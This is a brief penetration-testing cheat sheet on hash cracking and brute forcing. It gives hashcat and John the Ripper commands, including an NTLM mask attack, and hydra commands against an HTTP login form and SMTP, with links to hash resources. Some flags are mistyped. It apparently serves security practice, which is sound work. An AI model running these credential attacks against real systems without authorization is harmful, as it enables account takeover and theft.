🔓Hashing & Password Cracking

• Copy

  hash-identifier [hash]

• Copy

  john hashes.txt

• Copy

  hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt

• Copy

  hashcat -m 1000 dump.txt -o output.txt --remove -a 3 ?u?l?l?d?d?d?d

  • Brute force crack for NTLM hashes with an uppercase, lowercase, lowercase, and 4 digit mask

• List of hash types and examples for hashcat https://hashcat.net/wiki/doku.php?id=example_hashes

• https://hashkiller.co.uk has a good repo of already cracked MD5 and NTLM hashes

Bruteforcing:

• Copy

  hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin

• Copy

  hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL

• Copy

  hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V

  • Hydra SMTP Brute force